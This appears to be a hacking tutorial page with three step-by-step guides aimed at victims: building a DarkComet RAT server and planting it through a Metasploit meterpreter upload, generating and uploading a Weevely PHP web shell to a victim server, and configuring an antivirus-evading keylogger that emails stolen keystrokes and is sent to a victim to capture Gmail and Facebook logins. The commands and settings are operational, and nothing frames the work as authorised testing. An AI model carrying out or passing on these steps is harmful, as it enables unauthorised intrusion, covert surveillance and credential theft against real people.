Hack Remote PC using Darkcomet RAT with Metasploit

Download DarkcometRAT From here after downloading Darkcomet unzip the archive file

Set the location of darkcomet and type “wine DarkComet.exe

First open DARKCOMET RAT and click on ‘I Accept’ (bottom right side of the screen)

In next screen click on DARKCOMET RAT then select Server module option and click on Minimalist

In this option it will display a form, fill the ID with your name, IP Address and desired Port No. Also add the destination path where you want to save the .exe file then click on Normal

Now save it on your desktop.

Again open DARKCOMET RAT and select listen to new port option

Now enter the port number used in the form above and click on Listen

Now hack victim’s PC using Metasploit How to Hack Remote PC

Now you’ll get a meterpreter of victim’s PC. Use upload command to upload your backdoor exe file which you created using darkcomet

Upload /root/Desktop/updates.exe d:\\

Now type shell to get the command prompt of victim’s PC. And run uploaded exe file

Now you can get the session of victim’s PC. See the screenshot below:

Click on system info you can see the whole system information of victim’s PC

How to Create a Backdoor in Server using BackTrack (Weevely Tutorial)

Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application testing post exploitation, and can be used as a stealth backdoor web shell to manage legit web accounts, even free hosted ones. It is currently included in Backtrack and Backbox and other Linux distributions for penetration testing.

Open your backtrack terminal and type cd /pentest/backdoors/web/weevely


Now type ./weevely.py generate <password> <location, where u want to save file> .It will look something like this

. / weevely.py generate rajchandel (Password) /root/Desktop

Then upload that file in victim server, after uploading it, copy the URL of your uploaded file. Then type ./weevely.py <url> <password> .It will look something like this

. / weevely http://telecallerjobs.com/webdoor.php rajchandel


Uname –a – print all information

Free – display information about free and used memory on the system

pwd – print name of current/working directory

Df – displays the amount of disk space available on the filesystem containing each file name argument

W – Displays information about the users currently on the machine, and their processes

Ls – List information about the FILEs (the current directory by default)

How to Hack Gmail Facebook using FUD Keylogger

First Download Project Neptune Keylogger

Open the program 

Double click on the program where you downloaded it

First check the button that says “Use Email for Storing Logs” Then change the amount of time the Keylogger sends logs.

In the Email settings tab keep the “smpt.gmail.com” and the port number 587 where it says “Email to Send Keystroke Logs” put your email in that box and in the box under that put the password to your email. 

If you want you can change what email it send the logs too, but otherwise use the same email that you put above. 

Then, Click Test Email Account Information, and if you get an email saying that it works, then you can move onto the next step. 

Keep all the settings the same, unless you want to disable task manager or block websites now will add some online virus scanning sites to block them —this means that the sites can’t scan the tool for virus.

Go to the installation tab and check the first box in “Startup Settings” Then Choose a place to install in the Installation Directory.

In the Installation Directory I would put it in the “AppData Folder

Then go to Original File Check “Do Nothing with Original File after Install” to keep suspicion level none.

If you want File downloading enabled then type in the link of your exe or other file, but if not then do nothing with this box.

Now go to ‘Server Creation‘ tab and press ‘Generate New Server’ under ‘server creation’, and give name of your Keylogger and that it… You are done.

You have successfully created a Keylogger server file. Now, simply send this file to your victim via email, once the victim runs our Keylogger, we will key logs every 20 min via email